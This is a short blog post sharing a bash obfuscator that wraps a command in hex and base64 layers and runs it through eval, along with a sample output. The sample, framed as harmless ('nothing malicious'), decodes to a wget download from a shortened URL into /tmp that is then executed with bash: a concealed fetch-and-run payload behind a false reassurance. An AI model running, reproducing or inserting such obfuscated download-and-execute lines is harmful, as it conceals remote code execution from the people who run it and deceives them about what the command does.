Sunday, October 27, 2013

A useless bash code obfuscation

Bash obfuscation is really hard. So just for fun I created a simple script that obfuscate a one-line bash code at cost of an huge size increase!

An example is:

eval `echo -e "\x65\x76\x61\x6c\x20\x60\x65\x63\x68\x6f\x20\x22\x64\x32\x64\x6c\x64\x43\x42\x6f\x64\x48\x52\x77\x4f\x69\x38\x76\x5a\x32\x39\x76\x4c\x6d\x64\x73\x4c\x31\x55\x30\x52\x31\x4e\x4d\x59\x53\x41\x74\x63\x55\x38\x67\x4c\x33\x52\x74\x63\x43\x39\x68\x63\x32\x51\x67\x4a\x69\x59\x67\x59\x6d\x46\x7a\x61\x43\x41\x76\x64\x47\x31\x77\x4c\x32\x46\x7a\x5a\x41\x3d\x3d\x22\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x64\x69\x60"`

I promise it's nothing malicious :)

The idea is to create multiple level of obfuscation and use eval to evaluate the deobfuscated string as bash code. The outer level is hexencoding, interpreted by echo -e. The second level is base64, interpreted by base64 -d.

Combinations can be a lot :P

The code of the obfuscator is:

#!/bin/bash
if [[ $# -ne 1 ]] ; then
  CMD="echo ciao"
else
  CMD=$1
fi
B64=$(echo -n $CMD | base64)
MIDDLE="eval \`echo \"$B64\" | base64 -di\`"
CODE=$(echo -n $MIDDLE | hexdump -v -e '"\\\x" 1/1 "%02x"')
LOL="eval \`echo -e \"$CODE\"\`"
echo $LOL

No comments: